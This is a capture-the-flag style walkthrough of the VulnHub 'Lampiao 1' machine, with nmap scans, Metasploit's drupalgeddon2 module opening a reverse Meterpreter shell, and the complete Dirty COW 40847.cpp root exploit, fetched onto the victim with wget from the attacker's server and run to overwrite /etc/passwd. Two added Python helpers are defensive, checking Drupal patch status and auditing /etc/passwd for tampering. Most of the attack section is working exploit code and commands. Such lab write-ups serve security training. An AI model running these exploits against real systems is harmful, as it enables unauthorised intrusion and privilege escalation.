VulnHub target machine penetration test [Lampiao-1]

Name

Name: Lampião: 1
Release date: 28 July 2018

Download

Lampiao.zip

  • Download: https://mega.nz/#!aG4AAaDB!CBLRRYQsAhTOyPJqyjC0Blr-weMH9QMdYbPfMj0LGeM
  • Download (Mirror): https://download.vulnhub.com/lampiao/Lampiao.zip
  • Download (Torrent): https://download.vulnhub.com/lampiao/Lampiao.zip.torrent

Description

Want to keep hacking in your own lab?
Try this brand-new vulnerable machine, "Lampião 1". Root it!

Level: Easy

Information gathering

Start with nmap.

root@kali:~# nmap -sn -v 192.168.66.*
Nmap scan report for 192.168.66.17
Host is up (0.00024s latency).
MAC Address: 00:0C:29:51:75:B7 (VMware)
root@kali:~# nmap -sV -p- -v 192.168.66.17
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.7 (Ubuntu Linux; protocol 2.0)
80/tcp open http?
1898/tcp open http Apache httpd 2.4.7 ((Ubuntu))
root@kali:~# nmap -A -p 22,80,1898 -v 192.168.66.17 --script=vuln
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.7 (Ubuntu Linux; protocol 2.0)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
80/tcp open http?
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| fingerprint-strings:
| NULL:
| _____ _ _
| |_|/ ___ ___ __ _ ___ _ _
| \x20| __/ (_| __ \x20|_| |_
| ___/ __| |___/ ___|__,_|___/__, ( )
| |___/
| ______ _ _ _
| ___(_) | | | |
| \x20/ _` | / _ / _` | | | |/ _` | |
|_ __,_|__,_|_| |_|
|_http-aspnet-debug: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-vuln-cve2014-3704: ERROR: Script execution failed (use -d to debug)
1898/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.66.17
| Found the following possible CSRF vulnerabilities:
|
| Path: http://192.168.66.17:1898/
| Form id: user-login-form
| Form action: /?q=node&destination=node
|
| Path: http://192.168.66.17:1898/?q=node/3
| Form id: user-login-form
| Form action: /?q=node/3&destination=node/3
|
| Path: http://192.168.66.17:1898/?q=node/1
| Form id: user-login-form
| Form action: /?q=node/1&destination=node/1
|
| Path: http://192.168.66.17:1898/?q=user/login&destination=node/3%23comment-form
| Form id: user-login
| Form action: /?q=user/login&destination=node/3%23comment-form
|
| Path: http://192.168.66.17:1898/?q=user/register&destination=node/1%23comment-form
| Form id: user-register-form
| Form action: /?q=user/register&destination=node/1%23comment-form
|
| Path: http://192.168.66.17:1898/?q=user/login&destination=node/1%23comment-form
| Form id: user-login
| Form action: /?q=user/login&destination=node/1%23comment-form
|
| Path: http://192.168.66.17:1898/?q=user/password
| Form id: user-pass
| Form action: /?q=user/password
|
| Path: http://192.168.66.17:1898/?q=node&destination=node
| Form id: user-login-form
| Form action: /?q=node&destination=node%3Famp%253Bdestination%3Dnode
|
| Path: http://192.168.66.17:1898/?q=user/register&destination=node/3%23comment-form
| Form id: user-register-form
| Form action: /?q=user/register&destination=node/3%23comment-form
|
| Path: http://192.168.66.17:1898/?q=user/register
| Form id: user-register-form
| Form action: /?q=user/register
|
| Path: http://192.168.66.17:1898/?q=node/3&destination=node/3
| Form id: user-login-form
| Form action: /?q=node/3&destination=node/3%3Famp%253Bdestination%3Dnode/3
|
| Path: http://192.168.66.17:1898/?q=node/1&destination=node/1
| Form id: user-login-form
| Form action: /?q=node/1&destination=node/1%3Famp%253Bdestination%3Dnode/1
|
| Path: http://192.168.66.17:1898/?q=user/login&destination=node/3%23comment-form
| Form id: user-login
|_ Form action: /?q=user/login&destination=node/3%23comment-form
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
| /robots.txt: Robots file
| /UPGRADE.txt: Drupal file
| /INSTALL.txt: Drupal file
| /INSTALL.mysql.txt: Drupal file
| /INSTALL.pgsql.txt: Drupal file
| /CHANGELOG.txt: Drupal v1
| /: Drupal version 7
| /README.txt: Interesting, a readme.
| /includes/: Potentially interesting directory w/ listing on 'apache/2.4.7 (ubuntu)'
| /misc/: Potentially interesting directory w/ listing on 'apache/2.4.7 (ubuntu)'
| /modules/: Potentially interesting directory w/ listing on 'apache/2.4.7 (ubuntu)'
| /scripts/: Potentially interesting directory w/ listing on 'apache/2.4.7 (ubuntu)'
| /sites/: Potentially interesting directory w/ listing on 'apache/2.4.7 (ubuntu)'
|_ /themes/: Potentially interesting directory w/ listing on 'apache/2.4.7 (ubuntu)'
|_http-server-header: Apache/2.4.7 (Ubuntu)
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_ http://ha.ckers.org/slowloris/
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| vulners:
| cpe:/a:apache:http_server:2.4.7:
| CVE-2020-1934 7.5 https://vulners.com/cve/CVE-2020-1934
| CVE-2017-7679 7.5 https://vulners.com/cve/CVE-2017-7679
| CVE-2018-1312 6.8 https://vulners.com/cve/CVE-2018-1312
| CVE-2017-15715 6.8 https://vulners.com/cve/CVE-2017-15715
| CVE-2014-0226 6.8 https://vulners.com/cve/CVE-2014-0226
| CVE-2017-9788 6.4 https://vulners.com/cve/CVE-2017-9788
| CVE-2019-0217 6.0 https://vulners.com/cve/CVE-2019-0217
| CVE-2020-1927 5.8 https://vulners.com/cve/CVE-2020-1927
| CVE-2019-10098 5.8 https://vulners.com/cve/CVE-2019-10098
| CVE-2019-0220 5.0 https://vulners.com/cve/CVE-2019-0220
| CVE-2018-17199 5.0 https://vulners.com/cve/CVE-2018-17199
| CVE-2017-9798 5.0 https://vulners.com/cve/CVE-2017-9798
| CVE-2017-15710 5.0 https://vulners.com/cve/CVE-2017-15710
| CVE-2016-8743 5.0 https://vulners.com/cve/CVE-2016-8743
| CVE-2016-2161 5.0 https://vulners.com/cve/CVE-2016-2161
| CVE-2016-0736 5.0 https://vulners.com/cve/CVE-2016-0736
| CVE-2014-3523 5.0 https://vulners.com/cve/CVE-2014-3523
| CVE-2014-0231 5.0 https://vulners.com/cve/CVE-2014-0231
| CVE-2019-10092 4.3 https://vulners.com/cve/CVE-2019-10092
| CVE-2016-4975 4.3 https://vulners.com/cve/CVE-2016-4975
| CVE-2015-3185 4.3 https://vulners.com/cve/CVE-2015-3185
| CVE-2014-8109 4.3 https://vulners.com/cve/CVE-2014-8109
| CVE-2014-0118 4.3 https://vulners.com/cve/CVE-2014-0118
| CVE-2014-0117 4.3 https://vulners.com/cve/CVE-2014-0117
| CVE-2018-1283 3.5 https://vulners.com/cve/CVE-2018-1283
|_ CVE-2016-8612 3.3 https://vulners.com/cve/CVE-2016-8612

The Nmap scan shows ports 22, 80 and 1898 open, so open the IP address and port 1898 in a browser. That gives the clue that the web page is running Drupal.

Based on that clue, try the drupal_drupalgeddon2 exploit.
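
As an added defender-side check, not part of the original walkthrough: the http-enum output above found /CHANGELOG.txt, whose first header line names the newest Drupal release. This Python helper (function names are my own) reads that header and reports whether a Drupal 7 install predates the release carrying the Drupalgeddon2 fix, Drupal 7.58, a version the page itself does not state; the sample changelog is constructed.

```python
import re
import urllib.request
from typing import Optional, Tuple

# First Drupal 7 release carrying the Drupalgeddon2 fix (SA-CORE-2018-002).
# Stated as a known fact; this value does not come from the walkthrough.
FIXED_D7 = (7, 58)

# Drupal's CHANGELOG.txt opens with the newest release header, for example
# "Drupal 7.57, 2018-02-21" followed by a dashed underline.
HEADER_RE = re.compile(r"^Drupal (\d+)\.(\d+)(?:\.(\d+))?, \d{4}-\d{2}-\d{2}", re.M)

# Constructed sample changelog (not the real file from the Lampiao machine).
SAMPLE_CHANGELOG = """\
Drupal 7.57, 2018-02-21
-----------------------
- Fixed security issues (multiple vulnerabilities). See SA-CORE-2018-001.

Drupal 7.56, 2017-06-21
-----------------------
- Fixed security issues (access bypass). See SA-CORE-2017-003.
"""


def drupal_version(changelog: str) -> Optional[Tuple[int, ...]]:
    """Return the newest release in a CHANGELOG.txt as a tuple, or None."""
    m = HEADER_RE.search(changelog)
    if not m:
        return None
    parts = [int(m.group(1)), int(m.group(2))]
    if m.group(3):
        parts.append(int(m.group(3)))
    return tuple(parts)


def vulnerable_to_drupalgeddon2(changelog: str) -> Optional[bool]:
    """True/False for Drupal 7 changelogs; None when no verdict can be given
    (unparseable text, or a branch this helper does not track)."""
    v = drupal_version(changelog)
    if v is None or v[0] != 7:
        return None
    return v < FIXED_D7


def fetch_changelog(base_url: str, timeout: float = 5.0) -> str:
    """Download CHANGELOG.txt from a site you administer, e.g. http://host:1898/."""
    url = base_url.rstrip("/") + "/CHANGELOG.txt"
    with urllib.request.urlopen(url, timeout=timeout) as resp:
        return resp.read().decode("utf-8", errors="replace")


if __name__ == "__main__":
    print(drupal_version(SAMPLE_CHANGELOG), vulnerable_to_drupalgeddon2(SAMPLE_CHANGELOG))
```

Leaving CHANGELOG.txt readable is itself a disclosure: the same header that lets you verify patch status tells anyone else exactly which release is deployed.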

msf5 > search drupalgeddon2

Matching Modules
================

# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/unix/webapp/drupal_drupalgeddon2 2018-03-28 excellent Yes Drupal Drupalgeddon 2 Forms API Property Injection


msf5 > use exploit/unix/webapp/drupal_drupalgeddon2
msf5 exploit(unix/webapp/drupal_drupalgeddon2) > show options

Module options (exploit/unix/webapp/drupal_drupalgeddon2):

Name Current Setting Required Description
---- --------------- -------- -----------
DUMP_OUTPUT false no Dump payload command output
PHP_FUNC passthru yes PHP function to execute
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes Path to Drupal install
VHOST no HTTP server virtual host


Exploit target:

Id Name
-- ----
0 Automatic (PHP In-Memory)


msf5 exploit(unix/webapp/drupal_drupalgeddon2) > set RHOSTS 192.168.66.17
RHOSTS => 192.168.66.17
msf5 exploit(unix/webapp/drupal_drupalgeddon2) > set RPORT 1898
RPORT => 1898
msf5 exploit(unix/webapp/drupal_drupalgeddon2) > exploit

[*] Started reverse TCP handler on 192.168.66.6:4444
[*] Sending stage (38288 bytes) to 192.168.66.17
[*] Meterpreter session 1 opened (192.168.66.6:4444 -> 192.168.66.17:58696) at 2020-04-07 22:59:18 -0400

meterpreter >
meterpreter > sessions 1
[*] Session 1 is already interactive.
meterpreter > ls
Listing: /var/www/html
======================

Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100755/rwxr-xr-x 110781 fil 2018-04-19 15:39:33 -0400 CHANGELOG.txt
100755/rwxr-xr-x 1481 fil 2018-04-19 15:39:33 -0400 COPYRIGHT.txt
100755/rwxr-xr-x 1717 fil 2018-04-19 15:39:33 -0400 INSTALL.mysql.txt
100755/rwxr-xr-x 1874 fil 2018-04-19 15:39:33 -0400 INSTALL.pgsql.txt
100755/rwxr-xr-x 1298 fil 2018-04-19 15:39:33 -0400 INSTALL.sqlite.txt
100755/rwxr-xr-x 17995 fil 2018-04-19 15:39:33 -0400 INSTALL.txt
100755/rwxr-xr-x 18092 fil 2018-04-19 15:39:33 -0400 LICENSE.txt
100644/rw-r--r-- 3427612 fil 2018-04-20 13:20:38 -0400 LuizGonzaga-LampiaoFalou.mp3
100755/rwxr-xr-x 8710 fil 2018-04-19 15:39:33 -0400 MAINTAINERS.txt
100755/rwxr-xr-x 5382 fil 2018-04-19 15:39:33 -0400 README.txt
100755/rwxr-xr-x 10123 fil 2018-04-19 15:39:33 -0400 UPGRADE.txt
100644/rw-r--r-- 34715 fil 2018-04-20 13:09:26 -0400 audio.m4a
100755/rwxr-xr-x 6604 fil 2018-04-19 15:39:33 -0400 authorize.php
100755/rwxr-xr-x 720 fil 2018-04-19 15:39:33 -0400 cron.php
40755/rwxr-xr-x 4096 dir 2018-04-19 15:39:33 -0400 includes
100755/rwxr-xr-x 529 fil 2018-04-19 15:39:33 -0400 index.php
100755/rwxr-xr-x 703 fil 2018-04-19 15:39:33 -0400 install.php
100755/rwxr-xr-x 267732 fil 2015-08-03 22:51:40 -0400 lampiao.jpg
40755/rwxr-xr-x 4096 dir 2018-04-19 15:39:33 -0400 misc
40755/rwxr-xr-x 4096 dir 2018-04-19 15:39:33 -0400 modules
40755/rwxr-xr-x 4096 dir 2018-04-19 15:39:33 -0400 profiles
100644/rw-r--r-- 9674 fil 2018-04-20 12:48:37 -0400 qrc.png
100755/rwxr-xr-x 2189 fil 2018-04-19 15:39:33 -0400 robots.txt
40755/rwxr-xr-x 4096 dir 2018-04-19 15:39:33 -0400 scripts
40755/rwxr-xr-x 4096 dir 2018-04-19 15:39:33 -0400 sites
40755/rwxr-xr-x 4096 dir 2018-04-19 15:39:33 -0400 themes
100755/rwxr-xr-x 19986 fil 2018-04-19 15:39:33 -0400 update.php
100755/rwxr-xr-x 2200 fil 2018-04-19 15:39:33 -0400 web.config
100755/rwxr-xr-x 417 fil 2018-04-19 15:39:33 -0400 xmlrpc.php

meterpreter > shell
Process 4649 created.
Channel 0 created.
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
whoami
www-data
pwd
/var/www/html

Now that we have a meterpreter session, check the victim machine's details with the following commands:

python -c 'import pty; pty.spawn("/bin/bash")'
www-data@lampiao:/var/www/html$ lsb_release -a
lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description: Ubuntu 14.04.5 LTS
Release: 14.04
Codename: trusty

This output, the victim machine's release version, gives a very strong hint for the next step.

After a long search based on that version-number clue, I finally found the required exploit and downloaded it to my machine.

  • Linux kernel 2.6.22 - 3.9 Dirty COW /proc/self/mem race condition privilege escalation, /etc/passwd method

That is, Dirty COW privilege escalation.

40847.cpp

// EDB-Note: Compile:   g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil
// EDB-Note: Recommended way to run: ./dcow -s (Will automatically do "echo 0 > /proc/sys/vm/dirty_writeback_centisecs")
//
// -----------------------------------------------------------------
// Copyright (C) 2016 Gabriele Bonacini
//
// This program is free software; you can redistribute it and/or modify
// it under the terms of the GNU General Public License as published by
// the Free Software Foundation; either version 3 of the License, or
// (at your option) any later version.
// This program is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
// GNU General Public License for more details.
// You should have received a copy of the GNU General Public License
// along with this program; if not, write to the Free Software Foundation,
// Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
// -----------------------------------------------------------------

#include <iostream>
#include <fstream>
#include <string>
#include <thread>
#include <sys/mman.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/types.h>
#include <pwd.h>
#include <pty.h>
#include <string.h>
#include <termios.h>
#include <sys/wait.h>
#include <signal.h>

#define BUFFSIZE 1024
#define PWDFILE "/etc/passwd"
#define BAKFILE "./.ssh_bak"
#define TMPBAKFILE "/tmp/.ssh_bak"
#define PSM "/proc/self/mem"
#define ROOTID "root:"
#define SSHDID "sshd:"
#define MAXITER 300
#define DEFPWD "$6$P7xBAooQEZX/ham$9L7U0KJoihNgQakyfOQokDgQWLSTFZGB9LUU7T0W2kH1rtJXTzt9mG4qOoz9Njt.tIklLtLosiaeCBsZm8hND/"
#define TXTPWD "dirtyCowFun\n"
#define DISABLEWB "echo 0 > /proc/sys/vm/dirty_writeback_centisecs\n"
#define EXITCMD "exit\n"
#define CPCMD "cp "
#define RMCMD "rm "

using namespace std;

class Dcow{
private:
bool run, rawMode, opShell, restPwd;
void *map;
int fd, iter, master, wstat;
string buffer, etcPwd, etcPwdBak,
root, user, pwd, sshd;
thread *writerThr, *madviseThr, *checkerThr;
ifstream *extPwd;
ofstream *extPwdBak;
struct passwd *userId;
pid_t child;
char buffv[BUFFSIZE];
fd_set rfds;
struct termios termOld, termNew;
ssize_t ign;

void exitOnError(string msg);
public:
Dcow(bool opSh, bool rstPwd);
~Dcow(void);
int expl(void);
};

Dcow::Dcow(bool opSh, bool rstPwd) : run(true), rawMode(false), opShell(opSh), restPwd(rstPwd),
iter(0), wstat(0), root(ROOTID), pwd(DEFPWD), sshd(SSHDID), writerThr(nullptr),
madviseThr(nullptr), checkerThr(nullptr), extPwd(nullptr), extPwdBak(nullptr),
child(0){
userId = getpwuid(getuid());
user.append(userId->pw_name).append(":");
extPwd = new ifstream(PWDFILE);
while (getline(*extPwd, buffer)){
buffer.append("\n");
etcPwdBak.append(buffer);
if(buffer.find(root) == 0){
etcPwd.insert(0, root).insert(root.size(), pwd);
etcPwd.insert(etcPwd.begin() + root.size() + pwd.size(),
buffer.begin() + buffer.find(":", root.size()), buffer.end());
}else if(buffer.find(user) == 0 || buffer.find(sshd) == 0 ){
etcPwd.insert(0, buffer);
}else{
etcPwd.append(buffer);
}
}
extPwdBak = new ofstream(restPwd ? TMPBAKFILE : BAKFILE);
extPwdBak->write(etcPwdBak.c_str(), etcPwdBak.size());
extPwdBak->close();
fd = open(PWDFILE,O_RDONLY);
map = mmap(nullptr, etcPwdBak.size(), PROT_READ,MAP_PRIVATE, fd, 0);
}

Dcow::~Dcow(void){
extPwd->close();
close(fd);
delete extPwd; delete extPwdBak; delete madviseThr; delete writerThr; delete checkerThr;
if(rawMode) tcsetattr(STDIN_FILENO, TCSANOW, &termOld);
if(child != 0) wait(&wstat);
}

void Dcow::exitOnError(string msg){
cerr << msg << endl;
// if(child != 0) kill(child, SIGKILL);
throw new exception();
}

int Dcow::expl(void){
madviseThr = new thread([&](){ while(run){ madvise(map, etcPwdBak.size(), MADV_DONTNEED);} });
writerThr = new thread([&](){ int fpsm = open(PSM,O_RDWR);
while(run){ lseek(fpsm, reinterpret_cast<off_t>(map), SEEK_SET);
ign = write(fpsm, etcPwd.c_str(), etcPwdBak.size()); }
});
checkerThr = new thread([&](){ while(iter <= MAXITER){
extPwd->clear(); extPwd->seekg(0, ios::beg);
buffer.assign(istreambuf_iterator<char>(*extPwd),
istreambuf_iterator<char>());
if(buffer.find(pwd) != string::npos &&
buffer.size() >= etcPwdBak.size()){
run = false; break;
}
iter ++; usleep(300000);
}
run = false;
});

cerr << "Running ..." << endl;
madviseThr->join();
writerThr->join();
checkerThr->join();

if(iter <= MAXITER){
child = forkpty(&master, nullptr, nullptr, nullptr);

if(child == -1) exitOnError("Error forking pty.");

if(child == 0){
execlp("su", "su", "-", nullptr);
exitOnError("Error on exec.");
}

if(opShell) cerr << "Password overridden to: " << TXTPWD << endl;
memset(buffv, 0, BUFFSIZE);
ssize_t bytes_read = read(master, buffv, BUFFSIZE - 1);
if(bytes_read <= 0) exitOnError("Error reading su prompt.");
cerr << "Received su prompt (" << buffv << ")" << endl;

if(write(master, TXTPWD, strlen(TXTPWD)) <= 0)
exitOnError("Error writing pwd on tty.");

if(write(master, DISABLEWB, strlen(DISABLEWB)) <= 0)
exitOnError("Error writing cmd on tty.");

if(!opShell){
if(write(master, EXITCMD, strlen(EXITCMD)) <= 0)
exitOnError("Error writing exit cmd on tty.");
}else{
if(restPwd){
string restoreCmd = string(CPCMD).append(TMPBAKFILE).append(" ").append(PWDFILE).append("\n");
if(write(master, restoreCmd.c_str(), restoreCmd.size()) <= 0)
exitOnError("Error writing restore cmd on tty.");
restoreCmd = string(RMCMD).append(TMPBAKFILE).append("\n");
if(write(master, restoreCmd.c_str(), restoreCmd.size()) <= 0)
exitOnError("Error writing restore cmd (rm) on tty.");
}

if(tcgetattr(STDIN_FILENO, &termOld) == -1 )
exitOnError("Error getting terminal attributes.");

termNew = termOld;
termNew.c_lflag &= static_cast<unsigned long>(~(ICANON | ECHO));

if(tcsetattr(STDIN_FILENO, TCSANOW, &termNew) == -1)
exitOnError("Error setting terminal in non-canonical mode.");
rawMode = true;

while(true){
FD_ZERO(&rfds);
FD_SET(master, &rfds);
FD_SET(STDIN_FILENO, &rfds);

if(select(master + 1, &rfds, nullptr, nullptr, nullptr) < 0 )
exitOnError("Error on select tty.");

if(FD_ISSET(master, &rfds)) {
memset(buffv, 0, BUFFSIZE);
bytes_read = read(master, buffv, BUFFSIZE - 1);
if(bytes_read <= 0) break;
if(write(STDOUT_FILENO, buffv, bytes_read) != bytes_read)
exitOnError("Error writing on stdout.");
}

if(FD_ISSET(STDIN_FILENO, &rfds)) {
memset(buffv, 0, BUFFSIZE);
bytes_read = read(STDIN_FILENO, buffv, BUFFSIZE - 1);
if(bytes_read <= 0) exitOnError("Error reading from stdin.");
if(write(master, buffv, bytes_read) != bytes_read) break;
}
}
}
}

return [](int ret, bool shell){
string msg = shell ? "Exit.\n" : string("Root password is: ") + TXTPWD + "Enjoy! :-)\n";
if(ret <= MAXITER){cerr << msg; return 0;}
else{cerr << "Exploit failed.\n"; return 1;}
}(iter, opShell);
}

void printInfo(char* cmd){
cerr << cmd << " [-s] [-n] | [-h]\n" << endl;
cerr << " -s open directly a shell, if the exploit is successful;" << endl;
cerr << " -n combined with -s, doesn't restore the passwd file." << endl;
cerr << " -h print this synopsis;" << endl;
cerr << "\n If no param is specified, the program modifies the passwd file and exits." << endl;
cerr << " A copy of the passwd file will be create in the current directory as .ssh_bak" << endl;
cerr << " (unprivileged user), if no parameter or -n is specified.\n" << endl;
exit(1);
}

int main(int argc, char** argv){
const char flags[] = "shn";
int c;
bool opShell = false,
restPwd = true;

opterr = 0;
while ((c = getopt(argc, argv, flags)) != -1){
switch (c){
case 's':
opShell = true;
break;
case 'n':
restPwd = false;
break;
case 'h':
printInfo(argv[0]);
break;
default:
cerr << "Invalid parameter." << endl << endl;
printInfo(argv[0]);
}
}

if(!restPwd && !opShell){
cerr << "Invalid parameter: -n requires -s" << endl << endl;
printInfo(argv[0]);
}

Dcow dcow(opShell, restPwd);
return dcow.expl();
}
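
As an added defender-side check, not part of the original walkthrough or of the 40847.cpp source: the exploit above wins its race by writing a root line whose password field carries the DEFPWD hash straight into /etc/passwd, so a post-incident audit of that file can spot the tampering. This Python helper (names are my own) parses a passwd file, flags inline hashes, empty password fields, malformed lines and extra UID 0 accounts, and looks for the backup copy the exploit leaves behind; the sample passwd content is constructed.

```python
import os
from dataclasses import dataclass
from typing import List, Sequence

# Password-field values that mean "no hash stored here": shadowed or locked.
SHADOWED = {"x", "*", "!", "!!"}

# Backup copies the exploit writes (its BAKFILE / TMPBAKFILE defines).
EXPLOIT_BACKUP_PATHS = ("/tmp/.ssh_bak", "./.ssh_bak")


@dataclass
class PasswdFinding:
    line: int
    user: str
    reason: str


def audit_passwd(text: str) -> List[PasswdFinding]:
    """Flag entries with an inline hash, an empty password field,
    a malformed line, or a non-root account with UID 0."""
    findings: List[PasswdFinding] = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append(PasswdFinding(lineno, fields[0], f"malformed entry with {len(fields)} fields"))
            continue
        name, pw, uid, _gid, _gecos, _home, _shell = fields
        if pw == "":
            findings.append(PasswdFinding(lineno, name, "empty password field (no password required)"))
        elif pw not in SHADOWED:
            # Exactly what the Dirty COW /etc/passwd method produces for root.
            findings.append(PasswdFinding(lineno, name, "password hash stored inline instead of in /etc/shadow"))
        if uid.isdigit() and int(uid) == 0 and name != "root":
            findings.append(PasswdFinding(lineno, name, "non-root account with UID 0"))
    return findings


def leftover_backups(paths: Sequence[str] = EXPLOIT_BACKUP_PATHS) -> List[str]:
    """Return any exploit backup files present on this host."""
    return [p for p in paths if os.path.exists(p)]


# Constructed sample: /etc/passwd after the exploit has run. The root line carries
# the DEFPWD hash from the exploit source; the other entries are ordinary.
SAMPLE_PASSWD = """\
root:$6$P7xBAooQEZX/ham$9L7U0KJoihNgQakyfOQokDgQWLSTFZGB9LUU7T0W2kH1rtJXTzt9mG4qOoz9Njt.tIklLtLosiaeCBsZm8hND/:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
"""

if __name__ == "__main__":
    for f in audit_passwd(SAMPLE_PASSWD):
        print(f"line {f.line} ({f.user}): {f.reason}")
    print("backup artifacts:", leftover_backups())
```

On a live host, run the audit against the real file and compare it with the package-manager copy or a known-good baseline; the passwd line order also changes when this exploit runs, which a diff will show.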

Run a Python HTTP server so the victim machine can download the exploit from it.

Run on Kali:

root@kali:~/vulnhub/lampiao# python -m SimpleHTTPServer
Serving HTTP on 0.0.0.0 port 8000 ...
192.168.66.1 - - [08/Apr/2020 01:48:23] code 404, message File not found
192.168.66.1 - - [08/Apr/2020 01:48:23] "GET /robots.txt HTTP/1.1" 404 -
192.168.66.1 - - [08/Apr/2020 01:48:23] "GET / HTTP/1.1" 200 -
192.168.66.1 - - [08/Apr/2020 01:48:24] code 404, message File not found
192.168.66.1 - - [08/Apr/2020 01:48:24] "GET /favicon.ico HTTP/1.1" 404 -
192.168.66.17 - - [08/Apr/2020 01:49:04] "GET /40847.cpp HTTP/1.1" 200 -

Run on the victim:

www-data@lampiao:/var/www/html$ cd /tmp
cd /tmp
www-data@lampiao:/tmp$ ls
ls
www-data@lampiao:/tmp$ wget http://192.168.66.6:8000/40847.cpp
wget http://192.168.66.6:8000/40847.cpp
--2020-04-08 01:45:33-- http://192.168.66.6:8000/40847.cpp
Connecting to 192.168.66.6:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 10531 (10K) [text/x-c++src]
Saving to: '40847.cpp'

100%[======================================>] 10,531 --.-K/s in 0s

2020-04-08 01:45:33 (391 MB/s) - '40847.cpp' saved [10531/10531]

www-data@lampiao:/tmp$ ls
ls
40847.cpp

The file has now been downloaded into the server's /tmp (world-writable) directory. Since the exploit is a .cpp file that has to be compiled and run, the exploit source itself provides the exact commands, which tell us how to compile and run 40847.cpp.

Now we have a root shell! Read the flag.

www-data@lampiao:/tmp$ ls
ls
40847.cpp
www-data@lampiao:/tmp$ g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil
<-Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil
www-data@lampiao:/tmp$ ./dcow -s
./dcow -s
Running ...
Password overridden to: dirtyCowFun

Received su prompt (Password: )

echo 0 > /proc/sys/vm/dirty_writeback_centisecs
cp /tmp/.ssh_bak /etc/passwd
rm /tmp/.ssh_bak
root@lampiao:~# echo 0 > /proc/sys/vm/dirty_writeback_centisecs
root@lampiao:~# cp /tmp/.ssh_bak /etc/passwd
root@lampiao:~# rm /tmp/.ssh_bak
root@lampiao:~# id
id
uid=0(root) gid=0(root) groups=0(root)
root@lampiao:~# whoami
whoami
root
root@lampiao:~# cd /root
cd /root
root@lampiao:~# ls
ls
flag.txt
root@lampiao:~# cat flag.txt
cat flag.txt
9740616875908d91ddcdaa8aea3af366

Key takeaways

  • msf drupal_drupalgeddon2 exploitation
  • Linux kernel 2.6.22 - 3.9 Dirty COW /proc/self/mem race condition privilege escalation, /etc/passwd method (Dirty COW privilege escalation)

Game over

Sorry, this time I still couldn't find that Greek guru's foolproof one-click clear script, I am so sorry about this… It's a pity…

The end, to be continued…